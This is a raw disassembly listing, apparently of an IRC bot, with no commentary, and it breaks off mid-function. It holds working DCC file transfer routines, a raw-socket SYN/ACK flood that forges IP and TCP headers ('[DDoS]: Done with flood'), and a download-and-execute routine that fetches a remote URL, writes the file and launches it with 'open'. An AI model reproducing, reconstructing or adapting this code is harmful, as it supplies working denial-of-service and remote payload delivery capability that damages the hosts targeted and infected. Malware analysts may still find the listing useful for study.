var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
push 1
xor esi, esi
pop ebx
mov [ebp+var_10], esi
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call dword_44B740 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_4046AB
push offset aDccFailedToCre ; "[DCC]: Failed to create socket."
jmp loc_404864
; ---------------------------------------------------------------------------
loc_4046AB: ; CODE XREF: sub_40465D+42�j
push 10h
lea eax, [ebp+var_30]
push esi
push eax
call sub_4189A0
add esp, 0Ch
mov [ebp+var_30], 2
push esi
call dword_44B6C0 ; htons
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+var_30]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call dword_44B6EC ; bind
test eax, eax
jz short loc_4046E9
push offset aDccFailedToBin ; "[DCC]: Failed to bind to socket."
jmp loc_404864
; ---------------------------------------------------------------------------
loc_4046E9: ; CODE XREF: sub_40465D+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_30]
push eax
push edi
call dword_44B664 ; getsockname
push [ebp+var_2E]
call dword_44B5FC ; htons
mov [ebp+var_4], eax
lea eax, [ebp+var_1E0]
push eax
mov [ebp+arg_0], esi
call sub_418E70
pop ecx
loc_40471B: ; CODE XREF: sub_40465D+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+var_1E0]
cmp al, 20h
jnz short loc_40472E
push 5Fh
pop eax
jmp short loc_404731
; ---------------------------------------------------------------------------
loc_40472E: ; CODE XREF: sub_40465D+CA�j
movsx eax, al
loc_404731: ; CODE XREF: sub_40465D+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+var_1E0]
inc ecx
push eax
mov [ebp+arg_0], ecx
call sub_418E70
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_40471B
push ebx
push edi
call dword_44B6E8 ; listen
test eax, eax
jz short loc_404764
push offset aDccFailedToO_1 ; "[DCC]: Failed to open socket."
jmp loc_404864
; ---------------------------------------------------------------------------
loc_404764: ; CODE XREF: sub_40465D+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+var_1E0]
push 80000000h
push eax
call ds:dword_4942EC
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40478E
push offset aDccFileDoesnTE ; "[DCC]: File doesn't exist."
jmp loc_404864
; ---------------------------------------------------------------------------
loc_40478E: ; CODE XREF: sub_40465D+125�j
push esi
push eax
call ds:dword_49431C
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_40AFEC
pop ecx
push eax
call dword_44B700 ; inet_addr
push eax
call dword_44B6BC ; htonl
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset dword_437D20
push eax
call sub_418D70
push esi
lea eax, [ebp+var_3FC]
push esi
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_40842D
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call dword_44B6A8 ; select
test eax, eax
jg short loc_40483E
push esi
lea eax, [ebp+var_DC]
push [ebp+var_54]
push offset aDccSendTimeout ; "[DCC]: Send timeout."
push eax
push [ebp+var_1FC]
call sub_40842D
jmp loc_404962
; ---------------------------------------------------------------------------
loc_40483E: ; CODE XREF: sub_40465D+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call dword_44B754 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_404877
push offset aDccUnableToOpe ; "[DCC]: Unable to open socket."
loc_404864: ; CODE XREF: sub_40465D+49�j
; sub_40465D+87�j ...
lea eax, [ebp+var_3FC]
push eax
call sub_418D70
pop ecx
pop ecx
jmp loc_404965
; ---------------------------------------------------------------------------
loc_404877: ; CODE XREF: sub_40465D+200�j
push edi
call dword_44B758 ; closesocket
cmp [ebp+arg_0], esi
jz loc_404929
mov edi, 400h
loc_40488C: ; CODE XREF: sub_40465D+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_404899
mov [ebp+var_4], eax
loc_404899: ; CODE XREF: sub_40465D+237�j
push edi
lea eax, [ebp+var_A04]
push esi
push eax
call sub_4189A0
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call ds:dword_494318
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
call ds:dword_4942DC
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call dword_44B710 ; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call dword_44B6D8 ; recv
cmp eax, ebx
jl loc_4049BE
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_4049BE
sub [ebp+arg_0], eax
jnz loc_40488C
mov edi, [ebp+var_18]
loc_404929: ; CODE XREF: sub_40465D+224�j
push [ebp+var_8]
call ds:dword_4942E0
push [ebp+var_C]
push [ebp+var_10]
call sub_4055AD
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1E0]
push eax
push [ebp+var_44]
call dword_44B74C ; inet_ntoa
push eax
lea eax, [ebp+var_3FC]
push offset aDccTransferCom ; "[DCC]: Transfer complete to IP: %s, Fil"...
push eax
call sub_418D70
loc_404962: ; CODE XREF: sub_40465D+1DC�j
add esp, 14h
loc_404965: ; CODE XREF: sub_40465D+215�j
cmp [ebp+var_50], esi
jnz short loc_40498A
push esi
lea eax, [ebp+var_3FC]
push [ebp+var_54]
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_40842D
add esp, 14h
loc_40498A: ; CODE XREF: sub_40465D+30B�j
lea eax, [ebp+var_3FC]
push eax
call sub_4035E1
cmp edi, esi
pop ecx
jbe short loc_4049A2
push edi
call dword_44B758 ; closesocket
loc_4049A2: ; CODE XREF: sub_40465D+33C�j
push [ebp+var_1F8]
call dword_44B758 ; closesocket
push [ebp+var_58]
call sub_416507
pop ecx
push esi
call ds:dword_4942FC
loc_4049BE: ; CODE XREF: sub_40465D+2AF�j
; sub_40465D+2BA�j
push esi
lea eax, [ebp+var_DC]
push [ebp+var_54]
push offset aDccSocketError ; "[DCC]: Socket error."
push eax
push [ebp+var_1FC]
call sub_40842D
push offset aDccSocketErr_0 ; "[DCC]: Socket error."
call sub_4035E1
add esp, 18h
push [ebp+var_1F8]
call dword_44B758 ; closesocket
push [ebp+var_58]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
sub_40465D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A02 proc near ; DATA XREF: sub_40C50A+797�o
var_14C4 = byte ptr -14C4h
var_4C4 = byte ptr -4C4h
var_2C4 = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call sub_418D40
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [ebp+var_8], ebx
mov [eax+1B0h], esi
lea eax, [ebp+var_2C4]
push 104h
push eax
call ds:dword_494320
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_2C4]
push offset aSS_0 ; "%s%s"
push eax
call sub_418D70
add esp, 10h
lea eax, [ebp+var_2C4]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call ds:dword_4942EC
cmp eax, 0FFFFFFFFh
jnz short loc_404A8C
push offset aDccErrorUnable ; "[DCC]: Error unable to write file to di"...
jmp short loc_404AD2
; ---------------------------------------------------------------------------
loc_404A8C: ; CODE XREF: sub_404A02+81�j
push eax
call ds:dword_4942E0
lea eax, [ebp+var_2C4]
push offset aAB ; "a+b"
push eax
call sub_419D70
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_404AB4
push offset aDccErrorOpenin ; "[DCC]: Error opening file for writing."
jmp short loc_404AD2
; ---------------------------------------------------------------------------
loc_404AB4: ; CODE XREF: sub_404A02+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_404416
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_404AE5
push offset aDccErrorOpen_0 ; "[DCC]: Error opening socket."
loc_404AD2: ; CODE XREF: sub_404A02+88�j
; sub_404A02+B0�j
lea eax, [ebp+var_4C4]
push eax
call sub_418D70
pop ecx
pop ecx
jmp loc_404BDF
; ---------------------------------------------------------------------------
loc_404AE5: ; CODE XREF: sub_404A02+C9�j
mov esi, 1000h
loc_404AEA: ; CODE XREF: sub_404A02+14E�j
push esi
lea eax, [ebp+var_14C4]
push ebx
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+var_14C4]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_44B6D8 ; recv
mov edi, eax
cmp edi, ebx
jz loc_404BB1
cmp edi, 0FFFFFFFFh
jz short loc_404B52
push [ebp+var_4]
lea eax, [ebp+var_14C4]
push edi
push 1
push eax
call sub_41A090
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call dword_44B6BC ; htonl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call dword_44B710 ; send
jmp short loc_404AEA
; ---------------------------------------------------------------------------
loc_404B52: ; CODE XREF: sub_404A02+118�j
lea eax, [ebp+var_4C4]
push offset aDccSocketErr_1 ; "[DCC]: Socket error."
push eax
call sub_418D70
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_40842D
lea eax, [ebp+var_4C4]
push eax
call sub_4035E1
push [ebp+var_4]
call sub_419740
add esp, 24h
push [ebp+arg_0]
call dword_44B758 ; closesocket
push [ebp+var_1C]
call sub_416507
pop ecx
push 1
call ds:dword_4942FC
loc_404BB1: ; CODE XREF: sub_404A02+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_4055AD
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_4C4]
push offset aDccTransferC_0 ; "[DCC]: Transfer complete from IP: %s, F"...
push eax
call sub_418D70
add esp, 1Ch
loc_404BDF: ; CODE XREF: sub_404A02+DE�j
cmp [ebp+var_14], ebx
jnz short loc_404C04
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_40842D
add esp, 14h
loc_404C04: ; CODE XREF: sub_404A02+1E0�j
lea eax, [ebp+var_4C4]
push eax
call sub_4035E1
cmp [ebp+var_4], ebx
pop ecx
jz short loc_404C1F
push [ebp+var_4]
call sub_419740
pop ecx
loc_404C1F: ; CODE XREF: sub_404A02+212�j
cmp [ebp+arg_0], ebx
jbe short loc_404C2D
push [ebp+arg_0]
call dword_44B758 ; closesocket
loc_404C2D: ; CODE XREF: sub_404A02+220�j
push [ebp+var_1C]
call sub_416507
pop ecx
push ebx
call ds:dword_4942FC
sub_404A02 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404C3D proc near ; DATA XREF: sub_40C50A+3A1C�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_494308
push eax
call sub_418FF0
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_405026
push eax
lea eax, [ebp+var_494]
push offset aDdosDoneWithFl ; "[DDoS]: Done with flood (%iKB/sec)."
push eax
call sub_418D70
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_404CCD
push esi
lea eax, [ebp+var_494]
push [ebp+var_C]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_40842D
add esp, 14h
loc_404CCD: ; CODE XREF: sub_404C3D+6E�j
lea eax, [ebp+var_494]
push eax
call sub_4035E1
push [ebp+var_290]
call sub_416507
pop ecx
pop ecx
push esi
call ds:dword_4942FC
pop edi
pop esi
sub_404C3D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404CEF proc near ; CODE XREF: sub_405026+40�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_44B638 ; WSAStartup
test eax, eax
jz short loc_404D2F
xor eax, eax
jmp loc_405022
; ---------------------------------------------------------------------------
loc_404D2F: ; CODE XREF: sub_404CEF+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_44B764 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_40501A
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call dword_44B6A0 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_405010
push [ebp+arg_C]
mov [ebp+var_58], 2
call dword_44B6C0 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call dword_44B6C0 ; htons
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call dword_44B6C0 ; htons
mov [ebp+var_12], ax
call sub_419000
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_44B6C0 ; htons
push 12345678h
mov [ebp+var_14], ax
call dword_44B6BC ; htonl
push offset aDdos_syn ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+arg_8]
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_404DFF
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_404E53
; ---------------------------------------------------------------------------
loc_404DFF: ; CODE XREF: sub_404CEF+105�j
push offset aDdos_ack ; "ddos.ack"
push [ebp+arg_8]
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_404E1B
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_404E53
; ---------------------------------------------------------------------------
loc_404E1B: ; CODE XREF: sub_404CEF+121�j
push offset aDdos_random ; "ddos.random"
push [ebp+arg_8]
call sub_419360
pop ecx
test eax, eax
pop ecx
jnz short loc_404E53
call sub_419000
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call sub_419000
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_404E53: ; CODE XREF: sub_404CEF+10E�j
; sub_404CEF+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call dword_44B6C0 ; htons
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+arg_8], ebx
call ds:dword_494328
lea eax, [ebp+var_1C]
push eax
call ds:dword_494324
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call sub_41A2F0
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_404EA1: ; CODE XREF: sub_404CEF+2E2�j
; sub_404CEF+2F0�j
mov [ebp+var_4], bx
call sub_419000
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_44B6C0 ; htons
mov [ebp+var_14], ax
call sub_419000
mov edi, eax
shl edi, 10h
call sub_419000
or edi, eax
push edi
call dword_44B6C0 ; htons
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_44B6BC ; htonl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_44B6C0 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_418A00
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_418A00
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40B045
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_418A00
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_418A00
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_4189A0
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40B045
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_418A00
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call dword_44B724 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_404FE4
add [ebp+arg_8], eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_494324
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_40500D
jl loc_404EA1
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jnb short loc_40500D
jmp loc_404EA1
; ---------------------------------------------------------------------------
loc_404FE4: ; CODE XREF: sub_404CEF+2CB�j
call dword_44B654 ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset aDdosSendErrorD ; "[DDoS]: Send error: <%d>."
push eax
call sub_418D70
lea eax, [ebp+var_F4]
push eax
call sub_4035E1
add esp, 10h
jmp short loc_405010
; ---------------------------------------------------------------------------
loc_40500D: ; CODE XREF: sub_404CEF+2E0�j
; sub_404CEF+2EE�j
mov ebx, [ebp+arg_8]
loc_405010: ; CODE XREF: sub_404CEF+78�j
; sub_404CEF+31C�j
push [ebp+var_20]
call dword_44B758 ; closesocket
pop esi
loc_40501A: ; CODE XREF: sub_404CEF+5B�j
call dword_44B620 ; WSACleanup
mov eax, ebx
loc_405022: ; CODE XREF: sub_404CEF+3B�j
pop edi
pop ebx
leave
retn
sub_404CEF endp
; =============== S U B R O U T I N E =======================================
sub_405026 proc near ; CODE XREF: sub_404C3D+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AED0
push [esp+10h+arg_4]
mov esi, eax
call sub_4195F0
push [esp+14h+arg_C]
mov ebx, eax
call sub_4195F0
mov edi, eax
call sub_419000
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_404CEF
add esp, 20h
test eax, eax
jnz short loc_405075
push 1
pop eax
loc_405075: ; CODE XREF: sub_405026+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_405026 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405084 proc near ; DATA XREF: sub_40C50A+3825�o
; sub_40C50A+3F67�o
var_590 = qword ptr -590h
var_584 = qword ptr -584h
var_510 = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_148 = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push dword_44B670
call dword_44B5D0 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_405510
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_148]
push 40000000h
push eax
call ds:dword_4942EC
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_40514B
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset aDownloadCouldn ; "[DOWNLOAD]: Couldn't open file: %s."
push eax
call sub_418D70
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40512E
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40842D
add esp, 14h
loc_40512E: ; CODE XREF: sub_405084+88�j
lea eax, [ebp+var_510]
push eax
call sub_4035E1
push [ebp+var_48]
call sub_416507
pop ecx
pop ecx
push esi
call ds:dword_4942FC
loc_40514B: ; CODE XREF: sub_405084+68�j
xor edi, edi
call ds:dword_494308
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx
call sub_416A10
pop ecx
mov [ebp+var_1C], eax
loc_405165: ; CODE XREF: sub_405084+1B4�j
push 200h
lea eax, [ebp+var_510]
push esi
push eax
call sub_4189A0
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_510]
push 200h
push eax
push [ebp+var_18]
call dword_44B5D8 ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_4051A9
push [ebp+arg_0]
lea eax, [ebp+var_510]
push eax
call sub_405576
pop ecx
pop ecx
loc_4051A9: ; CODE XREF: sub_405084+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+var_510]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call ds:dword_4942E4
cmp edi, ebx
jnb short loc_4051E7
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_4051D1
mov eax, [ebp+arg_0]
loc_4051D1: ; CODE XREF: sub_405084+148�j
push eax
lea eax, [ebp+var_510]
push eax
mov eax, [ebp+var_1C]
add eax, edi
push eax
call sub_418A00
add esp, 0Ch
loc_4051E7: ; CODE XREF: sub_405084+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_4051F4
cmp edi, [ebp+var_3C]
ja short loc_40523E
loc_4051F4: ; CODE XREF: sub_405084+169�j
cmp [ebp+var_44], 1
mov eax, edi
jz short loc_40520E
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset aDownloadFileDo ; "[DOWNLOAD]: File download: %s (%dKB tra"...
jmp short loc_40521E
; ---------------------------------------------------------------------------
loc_40520E: ; CODE XREF: sub_405084+176�j
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset aDownloadUpdate ; "[DOWNLOAD]: Update: %s (%dKB transferre"...
loc_40521E: ; CODE XREF: sub_405084+188�j
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_44CE58
push eax
call sub_418D70
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_405165
loc_40523E: ; CODE XREF: sub_405084+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_405293
cmp edi, [ebp+var_3C]
jz short loc_405293
push [ebp+var_3C]
lea eax, [ebp+var_510]
mov [ebp+var_14], esi
push edi
push offset aDownloadFilesi ; "[DOWNLOAD]: Filesize is incorrect: (%d "...
push eax
call sub_418D70
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40842D
lea eax, [ebp+var_510]
push eax
call sub_4035E1
add esp, 28h
loc_405293: ; CODE XREF: sub_405084+1C4�j
; sub_405084+1C9�j
call ds:dword_494308
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call ds:dword_4942E0
push [ebp+var_1C]
call sub_417480
cmp [ebp+var_38], esi
pop ecx
jz short loc_40531D
lea eax, [ebp+var_148]
push eax
call sub_4041AA
cmp eax, [ebp+var_38]
pop ecx
jz short loc_40531D
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+var_510]
push offset aDownloadCrcFai ; "[DOWNLOAD]: CRC Failed (%d != %d)."
push eax
call sub_418D70
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40842D
lea eax, [ebp+var_510]
push eax
call sub_4035E1
add esp, 28h
loc_40531D: ; CODE XREF: sub_405084+241�j
; sub_405084+253�j
cmp [ebp+var_14], esi
jz loc_40555D
cmp [ebp+var_44], 1
jz loc_405418
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_432420
lea eax, [ebp+var_148]
fstp [esp+584h+var_584]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_432420
fstp [esp+590h+var_590]
push offset aDownloadDownlo ; "[DOWNLOAD]: Downloaded %.1f KB to %s @ "...
push eax
call sub_418D70
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_405398
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40842D
add esp, 14h
loc_405398: ; CODE XREF: sub_405084+2F2�j
lea eax, [ebp+var_510]
push eax
call sub_4035E1
cmp [ebp+var_40], 1
pop ecx
jnz loc_40555D
push 5
push esi
lea eax, [ebp+var_148]
push esi
push eax
push offset aOpen ; "open"
push esi
call dword_44B634
cmp [ebp+var_30], esi
jnz loc_40555D
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
